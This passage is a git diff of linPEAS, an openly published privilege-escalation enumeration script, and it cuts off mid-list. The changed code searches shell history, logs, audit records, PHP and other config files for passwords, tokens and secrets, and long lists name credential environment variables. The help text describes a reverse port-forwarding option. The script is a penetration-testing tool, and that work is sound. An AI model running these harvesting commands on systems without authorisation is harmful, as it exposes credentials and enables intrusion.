-iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, backups +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" + filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70) + printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done + echo "" +fi + +##-- IF) Passwords in history cmd +if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history cmd" + history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "" +fi + +##-- IF) Passwords in history files +if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history files" + printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done + echo "" +fi + +##-- IF) Passwords in config PHP files +if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in config PHP files" + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + echo "" +fi + +##-- IF) Passwords files in home +if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + echo "" +fi + +##-- IF) TTY passwords +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Checking for TTY (sudo/su) passwords in audit logs" + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" + find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" + echo "" +fi + +##-- IF) IPs inside logs +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then + print_2title "Searching IPs inside logs (limit 70)" + (find /var/log/ /var/logs /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + echo "" +fi + +##-- IF) Passwords inside logs +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching passwords inside logs (limit 70)" + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," + echo "" +fi + +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then + ##-- IF) Emails inside logs + print_2title "Searching emails inside logs (limit 70)" + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Searching possible password variables inside key folders (limit 140)" + if ! [ "$SEARCH_IN_FOLDER" ]; then + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + else + timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + fi + wait + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" + if ! [ "$SEARCH_IN_FOLDER" ]; then + ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + else + ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + fi + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" +fi diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index 1d483be..c498f5f 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -26,6 +26,7 @@ GREEN="${C}[1;32m" SED_GREEN="${C}[1;32m&${C}[0m" YELLOW="${C}[1;33m" SED_YELLOW="${C}[1;33m&${C}[0m" +RED_YELLOW="${C}[1;31;103m" SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" BLUE="${C}[1;34m" SED_BLUE="${C}[1;34m&${C}[0m" @@ -88,8 +89,8 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW} -i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed - ${GREEN} Port forwarding: - ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a local IP to a remote IP + ${GREEN} Port forwarding (reverse connection): + ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT) ${GREEN} Firmware recon: ${YELLOW} -f ${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder @@ -118,16 +119,16 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do w) WAIT=1;; N) NOCOLOR="1";; D) DEBUG="1";; - t) AUTO_NETWORK_SCAN="1";; + t) AUTO_NETWORK_SCAN="1"; CHECKS="network_information";; e) EXTRA_CHECKS="1";; r) REGEXES="1";; f) SEARCH_IN_FOLDER=$OPTARG; if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" - SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; - fi; - ROOT_FOLDER=$SEARCH_IN_FOLDER; - REGEXES="1"; - CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_files,api_keys_regex";; + SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; + fi; + ROOT_FOLDER=$SEARCH_IN_FOLDER; + REGEXES="1"; + CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";; F) PORT_FORWARD=$OPTARG;; esac @@ -453,7 +454,9 @@ else nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/')"ImPoSSssSiBlEee" fi knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' -USER=$(whoami 2>/dev/null || echo "UserUnknown") +if ! [ "$USER" ]; then + USER=$(whoami 2>/dev/null || echo -n "UserUnknown") +fi if [ ! "$HOME" ]; then if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home else HOME="/home/$USER"; @@ -466,7 +469,7 @@ peass{VARIABLES} pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" -pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" +pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|DATABASE_PASSWORD|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER" pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER" pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAI